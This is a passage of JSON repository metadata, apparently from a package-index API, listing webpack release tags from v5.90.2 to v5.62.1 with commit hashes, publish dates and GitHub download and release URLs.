dency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1